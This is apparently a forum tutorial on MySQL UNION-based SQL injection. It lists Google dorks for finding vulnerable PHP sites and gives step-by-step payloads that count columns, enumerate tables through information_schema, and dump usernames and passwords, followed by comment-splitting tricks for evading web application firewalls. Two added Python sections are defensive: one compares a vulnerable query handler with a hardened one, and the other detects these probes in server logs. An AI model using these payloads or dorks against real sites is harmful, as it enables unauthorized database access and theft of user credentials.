For Educational / Security Uses Only
DISCLAIMER: I or the forum are not responsible for what you do with this information. For Educational / Security purposes only.
BE SURE TO READ FULLY!
THIS TUTORIAL IS COPYRIGHTED. YOU MAY NOT USE IT ANYWHERE ELSE WITHOUT MY EXPRESS WRITTEN PERMISSION. And I will FIRE MY DMCA LETTERS AT YOU!
Let me first start out by saying: this is not MSSQL injection, so this will not work on pages with an extension other than .php such as .asp or .aspx.
What is a SQL Injection?
In a nutshell, SQL injection, in the form shown below, is the modification of a URL parameter in order to manipulate the MySQL server behind the page into returning important data.
How to Find Vulnerable Sites
In order to perform a SQLi attack, you will need a vulnerable website. The best way is to use what's called a dork. A dork is a search query used to show websites that match your query. Here are some:
(For use on Google™)
inurl:index.php?id=
inurl:news.php?id=
inurl:shop.php?id=
inurl:shop.php?pid=
inurl:newsroom.php?id=
Use these dorks, or come up with your own, to find vulnerable websites using Google™.
Testing Your Target for Vulnerability
To test if your selected website is vulnerable to SQLi, add an apostrophe ( ' ) to the end of the variable. As shown below.
Code:
http://www.site.com/index.php?id=1'
If adding an apostrophe returns some sort of MySQL error, then your target is vulnerable.
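For readers on the defending side, here is the server-side pattern that produces the behaviour described above, beside a hardened version of the same lookup. This is an added example and not code from the original post: it is written in Python against an in-memory SQLite table standing in for the PHP/MySQL page, and the `news` table with its `id` and `title` columns is an assumed schema.

```python
import logging
import sqlite3

log = logging.getLogger("news")


def make_db():
    """Constructed in-memory stand-in for the site's MySQL database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "Welcome"), (2, "Second post")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern the tutorial relies on: the id parameter is pasted into the SQL
    text, and the database engine's own error message is echoed back to the browser."""
    sql = "SELECT title FROM news WHERE id=" + raw_id  # string concatenation: unsafe by design
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"DB ERROR: {exc}"  # the "MySQL error" the apostrophe test looks for
    return row[0] if row else "not found"


def lookup_hardened(conn, raw_id):
    """Reject anything that is not an integer, bind the value as a parameter, and
    keep engine errors out of the response."""
    try:
        news_id = int(raw_id)  # "1'" or "1 ORDER BY 2" never reach the database
    except ValueError:
        log.warning("rejected non-integer id %r", raw_id)  # worth alerting on
        return "not found"
    try:
        row = conn.execute("SELECT title FROM news WHERE id=?", (news_id,)).fetchone()
    except sqlite3.Error:
        log.exception("query failed for id=%d", news_id)  # details go to the log, not the page
        return "not found"
    return row[0] if row else "not found"


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1 ORDER BY 1", "1 ORDER BY 2"):
        print(f"{probe!r:16} vulnerable -> {lookup_vulnerable(db, probe)!r}")
        print(f"{'':16} hardened   -> {lookup_hardened(db, probe)!r}")
```

The vulnerable handler gives away two things the tutorial depends on: the raw apostrophe produces a visible engine error, and `ORDER BY n` with an out-of-range `n` produces a different error than `ORDER BY 1`, which is what leaks the column count. The hardened handler removes both signals by type-checking the parameter, binding it, and returning the same generic page whatever goes wrong, while the rejected value is logged so the probe is still visible to the operators.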
ORDER BY
After confirming the vulnerability in your target, use the ORDER BY command to find the number of columns in the query behind the page.
Ex.
Code:
http://www.site.com/index.php?id=1 ORDER BY 1--
Doing ORDER BY 1-- should always return the original page with NO error.
Then do ORDER BY 2--
If this shows the original page with NO error, continue.
Now try ORDER BY 3--
If this shows the original page with NO error, continue.
Continue increasing the ORDER BY number until you reach an error. For instance, if doing ORDER BY 10-- returns an error, then I have NINE (9) columns, NOT 10. Always subtract ONE from the number that produced the error.
UNION SELECT
After getting the number of columns, let's say we have NINE columns. Then you would type this:
Code:
http://www.site.com/index.php?id=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
You should see a page with a few numbers scattered throughout it. If so, continue, if NOT, try this:
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
Notice the hyphen between the number one and id=. If this produces the scattered numbers, continue, if not, move on to another target.
database()
After you see the scattered numbers, pick one to exploit. Say the numbers on my page are TWO and SEVEN. I will choose the number TWO. After choosing your number, put database() in place of it in your URL as shown below. REMEMBER, I chose number TWO.
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,database(),3,4,5,6,7,8,9--
That should return some text in place of the scattered TWO. WRITE THIS TEXT DOWN, and move on.
group_concat
This is where everything gets a little trickier! This is also the part where you will be extracting data. (Woohoo! Finally!)
After extracting the name of the database using database(), type this where you typed database() in the previous step.
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
TYPE THIS EXACTLY AS IT IS SHOWN, and press enter.
In place of the scattered TWO, you should see a LOT of text separated by commas. These are called tables. The text varies by website, but you usually want to look for things like "admin," "staff," or "users." Choose the one that interests you. For this tutorial, I will choose "users." Now type this:
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()--
This should return even more text. These are called columns. Again choose what interests you, but for this tutorial, I will choose "username" and "password." The columns "username" and "password" contain the data we want to extract.
To extract the final data, meaning, in this case, the usernames and passwords of all the users, type this:
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,group_concat(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from users--
Where it says "username,0x3a,password,0x3a" is where you would put the names of your chosen COLUMNS, such as username and password. DO NOT replace the 0x3a (it is the hex code for the colon that separates the fields), ONLY the username and password area. Where it says "from users--," replace "users" with the name of your chosen table (here, "users").
All of this will produce even MORE text in this format:
Code:
admin:thisismypass:,
The comma separates each set of data.
That's the end of the BASIC portion of this tutorial.
Web Application Firewalls
IF YOU ARE STOPPED AT ANY PORTION OF THE ABOVE DUE TO SOMETHING LIKE A 406 NOT ACCEPTABLE ERROR, READ ON.
At this time, I am not going to go into full detail with regard to what's below. I will, however, try to answer your questions.
Okay, so you are stuck. You could be at any part, like ORDER BY or UNION SELECT.
If you are stuck at ORDER BY, here are two ways to help you try to get back up and running.
If you type ORDER BY 10000000000-- and STILL get NO error, then your target is either NOT vulnerable OR it IS vulnerable, but to a separate type of injection known as a string injection. Here's how to do it.
Instead of typing
Code:
/index.php?id=1 ORDER BY 10000000--
, type
Code:
/index.php?id=1' ORDER BY 10000000-- -
NOTICE THE APOSTROPHE, AND THE SPACE AND THE SECOND HYPHEN AT THE END.
You should now have an error and you can continue with the rest.
If ORDER BY is blocked in some way, type this instead:
Code:
/*!ORDER BY*/
If you type UNION ALL SELECT and it is blocked in some way, try typing this instead:
Code:
/*!UNION*/ ALL /*!SELECT*/
If that doesn't work, try this:
Code:
/*!UNIunionON*/ ALL /*!SEselectLECT*/
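For anyone running the web application firewall rather than probing it, the inline-comment variants above are exactly what a keyword-only filter misses: MySQL executes the body of a `/*!...*/` versioned comment, so a filter that matches on the raw request text and the database engine disagree about what the request says. The following added example (not from the original post) normalizes each request the way the engine will read it, URL-decoding and unwrapping versioned comments before scoring it, and runs over a constructed sample of web-server log lines that mirror the steps of this tutorial. The log format, IP addresses, paths and threshold are all assumptions.

```python
import re
from urllib.parse import unquote_plus

# Combined-log-format line: client, method, path, status (remaining fields ignored).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# MySQL executes the body of /*!...*/ (optionally /*!50000...*/) comments, so strip only the
# delimiters and keep the keyword inside; ordinary /* ... */ comments become whitespace.
VERSIONED_COMMENT = re.compile(r"/\*!\d*|\*/")
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# (name, pattern, weight) applied to the normalized query string. No word boundaries on
# union/select, so a keyword hidden inside another token (UNIunionON) still matches.
INDICATORS = [
    ("union-select", re.compile(r"union.*select", re.S), 2),
    ("order-by-probe", re.compile(r"\border by \d+"), 2),
    ("information-schema", re.compile(r"information_schema"), 2),
    ("group-concat", re.compile(r"group_concat\("), 1),
    ("database-fn", re.compile(r"database\(\)"), 1),
    ("comment-terminator", re.compile(r"--"), 1),
    ("quote", re.compile(r"'"), 1),
]
THRESHOLD = 2  # assumed tuning: one weak indicator alone is not enough to flag


def normalize(query):
    """URL-decode twice (double encoding), unwrap /*!...*/, drop /* */, squash whitespace."""
    text = unquote_plus(unquote_plus(query))
    text = VERSIONED_COMMENT.sub("", text)
    text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower()


def score_request(path, status):
    """Return (score, [indicator names]) for one request path and response status."""
    text = normalize(path.partition("?")[2])
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            hits.append(name)
            score += weight
    # The tutorial's first signal is a database error shown to the client: a 5xx
    # response together with any indicator earns an extra point.
    if hits and status.startswith("5"):
        hits.append("5xx-with-indicator")
        score += 1
    return score, hits


def scan_log(lines):
    """Return [(ip, path, score, hits)] for every request scoring at or above THRESHOLD."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        score, hits = score_request(m["path"], m["status"])
        if score >= THRESHOLD:
            findings.append((m["ip"], m["path"], score, hits))
    return findings


# Constructed sample log: one client walking through the tutorial, plus a benign search.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 233',
    '203.0.113.9 - - [10/Oct/2023:13:55:48 +0000] "GET /index.php?id=1%20ORDER%20BY%2010-- HTTP/1.1" 500 233',
    '203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=-1%20/*!UNION*/%20ALL%20/*!SELECT*/%201,2,3-- HTTP/1.1" 200 611',
    '203.0.113.9 - - [10/Oct/2023:13:56:20 +0000] "GET /index.php?id=-1%20/*!UNIunionON*/%20ALL%20/*!SEselectLECT*/%201,group_concat(table_name),3%20from%20information_schema.tables-- HTTP/1.1" 200 640',
    '198.51.100.4 - - [10/Oct/2023:13:57:01 +0000] "GET /search.php?q=select+your+plan HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, path, score, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} score={score} {hits}\n    {path}")
```

The benign search containing the word "select" scores zero because no structural indicator accompanies it, while the lone apostrophe probe is flagged only because the server answered it with a 500; correlating request content with response status is what makes the cheapest probe visible without drowning in false positives.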
For now, that is all.
Thank you for reading, and I hope this helps everyone!